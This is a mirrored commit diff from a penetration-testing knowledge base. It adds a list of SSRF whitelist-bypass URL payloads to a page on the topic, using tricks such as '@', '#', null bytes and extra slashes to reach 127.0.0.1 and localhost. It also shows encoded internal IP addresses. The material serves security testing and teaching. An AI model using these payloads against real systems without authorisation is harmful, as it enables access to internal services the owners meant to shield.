mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [master] one page modified
This commit is contained in:
parent
ad182f406f
commit
9ae66f50b3
1 changed files with 23 additions and 0 deletions
|
@ -44,6 +44,29 @@ http://2130706433/ = http://127.0.0.1
|
|||
http://017700000001 = http://127.0.0.1
|
||||
http://3232235521/ = http://192.168.0.1
|
||||
http://3232235777/ = http://192.168.1.1
|
||||
|
||||
##Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)
|
||||
http://{domain}@127.0.0.1
|
||||
http://127.0.0.1#{domain}
|
||||
http://{domain}.127.0.0.1
|
||||
http://127.0.0.1/{domain}
|
||||
http://127.0.0.1/?d={domain}
|
||||
https://{domain}@127.0.0.1
|
||||
https://127.0.0.1#{domain}
|
||||
https://{domain}.127.0.0.1
|
||||
https://127.0.0.1/{domain}
|
||||
https://127.0.0.1/?d={domain}
|
||||
http://{domain}@localhost
|
||||
http://localhost#{domain}
|
||||
http://{domain}.localhost
|
||||
http://localhost/{domain}
|
||||
http://localhost/?d={domain}
|
||||
http://127.0.0.1%00{domain}
|
||||
http://127.0.0.1?{domain}
|
||||
http://127.0.0.1///{domain}
|
||||
https://127.0.0.1%00{domain}
|
||||
https://127.0.0.1?{domain}
|
||||
https://127.0.0.1///{domain}
|
||||
```
|
||||
|
||||
### Bypass using DNS -> localhost
|
||||
|
|
Loading…
Reference in a new issue